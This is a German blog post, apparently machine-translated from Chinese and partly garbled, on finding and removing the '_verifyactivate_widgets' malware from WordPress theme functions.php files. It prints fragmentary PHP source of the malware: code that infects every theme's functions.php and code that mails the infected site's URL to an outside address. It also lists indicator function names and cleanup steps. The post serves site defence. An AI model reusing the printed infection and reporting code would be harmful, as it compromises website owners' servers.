So bereinigen WordPress-Themes bösartigen Code _verifyactivate_widgets

最近Chen Weiliangderzeit verwendetDas Sicherheits-Plugin Wordfence Security scannt Websites auf bösartigen CodeDanach wurde es gefundenWordPressIn der Datei function.php des Themes ist der bösartige Virencode versteckt.

Bösartiger Code in der Datei functions.php des WordPress-Designs

Der wahrscheinlichste Ort für „bösartigen Code“ in WordPress ist function.php im Theme-Verzeichnis, normalerweise versteckt am Ende der Datei function.php.

Hauptproblem:Der bösartige Code erkennt bei jedem Besuch Ihrer Blog-Seite, ob alle Themen des aktuellen Blogs infiziert sind, und falls nicht, werden sie gemeinsam infiziert.

Danach wird beim Ausführen der Initialisierungsaktion init von wp geprüft, ob der aktuelle Blog eine E-Mail an das Postfach livethemas@ gesendet com

Woher weißt du, ob es gepostet wurde?

  • In deiner wp_options-Tabelle gibt es eine Datei namens_is_widget_active_Option, wenn sie erfolgreich gesendet wurde, setze ihren Wert auf 1;
  • Wenn nicht, verwenden Sie die Homepage-URL des aktuell infizierten Blogs als Titel und Inhalt.
  • Das ist es, keine anderen schlechten Dinge zu tun.

Der bösartige Virencode lautet wie folgt (es kann einige Unterschiede geben, aber der grundlegende Code ist derselbe):

function _verifyactivate_widgets(){
//查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容
$output=strip_tags($output, $allowed);
//取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
if (stripos($cont,$ftion) === false){
//查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 标记结尾的,连标记一起取过来
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
$output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f);
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
return $output;
function _get_allwidgets_cont($wids,$items=array()){
if(substr($places,-1) == “/”){

if(!file_exists($places) || !is_dir($places)){
return false;
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
return false;
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;

function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );

function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
return $dirArray;

add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option内容为空,即表示没有被感染过
if (!$widget_yes) :

global $wpdb, $post;
// post_author 为 [email protected] 的文章,肯定是没有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments实际上为 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//这里$sh_cont即为 [email protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

if($fakeit == 2) {
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
//开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
} else {
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
$output=rtrim($output, “\s\n\t\r\0\x0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 为 none …,又是在伪装
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
case(“span”) :
case(“p”) :
default :

if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”;
} else {
$output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”;
return $output;

add_action(“init”, “_getprepare_widget”);

function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””;
if(!$show_pass_post) $request .= ” AND post_password =\”\””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
if ($posts) {
foreach ($posts as $post) {
$output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after;
} else {
$output .= $before . “None found” . $after;
return $output;

Was ist der bösartige Code des WordPress-Themas?

Wenn beim Scannen mit dem Wordfence-Sicherheits-Plug-in festgestellt wird, dass Ihre Datei function.php manipuliert wurde, müssen Sie zum Beispiel Folgendes überprüfen:

  1. _verifyactivate_widgets
  2. Funktion _checkactive_widgets
  3. Funktion _get_allwidgets_cont
  4. Funktionsstreifen
  5. Funktion
  6. Funktion scandir
  7. Funktion _getprepare_widget
  8. Funktion __popular_posts
  9. add_action("admin_head", "_checkactive_widgets");
  10. add_action("init", "_getprepare_widget");
  11. _verify_isactivate_widgets
  12. _check_isactive_widget
  13. _get_allwidgetscont
  14. _prepare_widgets
  15. __Beliebte Beiträge
  • Jede Zeile ist unabhängig, wenn Sie den obigen Code in Ihrer functions.php haben, dann könnten Sie getroffen werden.
  • Unter ihnen sind Funktionen und add_action im Allgemeinen Code von „bösartigem Code“, der zu „Vorbereitungsaktivitäten“ gehört.

Wie entferne ich den schädlichen Virencode von WordPress theme function.php?

Es ist auch sehr einfach zu bereinigen, suchen Sie einfach den Code ähnlich dem obigen in der function.php-Datei des WordPress-Themes und löschen Sie ihn, aber da einmal infiziert, werden alle Themen in Ihrem Themen-Verzeichnis infiziert, also nur die aktuell Das verwendete Design ist ungültig und wird bald nach dem Löschen generiert.

Die Lösung besteht darin, den schädlichen Virencode eines WordPress-Themes zu entfernen, die Datei functions.php auf 444-Berechtigungen zu setzen und dann die anderen WordPress-Themes zu bereinigen.

Ob die 444-Berechtigung der letzten Datei functions.php zurückgeändert werden muss, wird vermutet, dass 444 relativ sicher ist und bei Bedarf geändert werden kann.

Hinweise zur Verwendung des Wordfence Security-Plugins

Wir empfehlen das WordPress-Plugin von Wordfence Security, ein WordPress-Sicherheits-Plugin mit integrierter Firewall und Malware-Scanning, das von einem großen Team entwickelt und gepflegt wird, das sich zu 100 % auf WordPress-Sicherheit konzentriert.

Obwohl es kostenpflichtige Module gibt, können wir mit dem kostenlosen Modul „Scan“ unsere WordPress-Seite nach PHP-Dateien scannen, die „bösartigen Code“ enthalten, obwohl es eine gewisse False-Positive-Rate gibt (hauptsächlich einige echte Plugins, die Theme-Verschlüsselungskomponente wird blockiert durch Fehlalarme), aber das Auffinden von "bösartigem Code" ist definitiv mehr Arbeit mit weniger Aufwand.

Es sollte beachtet werden, dass dieses Plug-in nicht empfohlen wird, häufig aktiviert zu werden, da seine Firewall und sein Sicherheitsschutz einen gewissen Lastdruck auf die Datenbank verursachen und die Leistung der Website beeinträchtigen.

Typischerweise sind Plugins aktiviert, um bei Bedarf "Scan"-Scans auszuführen.

Schließen Sie das Plug-in im Notfall nach Abschluss der Untersuchung.

